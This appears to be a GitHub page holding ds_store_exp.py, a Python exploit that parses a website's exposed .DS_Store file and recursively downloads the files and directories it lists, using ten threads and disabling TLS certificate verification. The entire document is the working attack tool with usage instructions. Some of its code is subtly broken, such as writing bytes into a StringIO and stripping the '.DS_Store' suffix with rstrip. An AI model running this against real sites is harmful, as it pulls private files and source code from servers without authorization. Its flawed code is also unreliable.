-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathds_store_exp.py
executable file
·103 lines (92 loc) · 3.45 KB
/
ds_store_exp.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# baiyunfei
import sys
import urllib
from io import StringIO
from urllib.parse import urlparse
import os
import queue
import ssl
import threading
from ds_store import DSStore
context = ssl._create_unverified_context()
class Scanner(object):
def __init__(self, start_url):
self.queue = queue.Queue()
self.queue.put(start_url)
self.processed_url = set()
self.lock = threading.Lock()
self.working_thread = 0
def process(self):
while True:
try:
url = self.queue.get(timeout=2.0)
self.lock.acquire()
self.working_thread += 1
self.lock.release()
except Exception as e:
if self.working_thread == 0:
break
else:
continue
try:
if url in self.processed_url:
pass
else:
self.processed_url.add(url)
base_url = url.rstrip('.DS_Store')
if not url.lower().startswith('http'):
url = 'http://%s' % url
schema, netloc, path, _, _, _ = urlparse(url, 'http')
try:
response = urllib.request.urlopen(url, context=context)
except Exception as e:
if hasattr(e, 'code') and e.code != 404:
self.lock.acquire()
print(f'{e.code}, {url}')
self.lock.release()
continue
data = response.read()
if response.code == 200:
folder_name = netloc.replace(':', '_') + '/'.join(path.split('/')[:-1])
if not os.path.exists(folder_name):
os.makedirs(folder_name)
with open(netloc.replace(':', '_') + path, 'wb') as outFile:
self.lock.acquire()
print(f'{response.code},{url}')
self.lock.release()
outFile.write(data)
if url.endswith('.DS_Store'):
ds_store_file = StringIO()
ds_store_file.write(data)
d = DSStore.open(ds_store_file)
dirs_files = set()
for x in d._traverse(None):
dirs_files.add(x.filename)
for name in dirs_files:
if name != '.':
self.queue.put(base_url + name)
self.queue.put(base_url + name + '/.DS_Store')
d.close()
except Exception as e:
self.lock.acquire()
print(f'[!] {str(e)}')
self.lock.release()
finally:
self.working_thread -= 1
def scan(self):
all_threads = []
for i in range(10):
t = threading.Thread(target=self.process)
all_threads.append(t)
t.start()
if __name__ == '__main__':
if len(sys.argv) == 1:
print('A .DS_Store file disclosure exploit.')
print('It parses .DS_Store and downloads file recursively.')
print()
print(' Usage: python ds_store_exp.py http://www.example.com/.DS_Store')
sys.exit(0)
s = Scanner(sys.argv[1])
s.scan()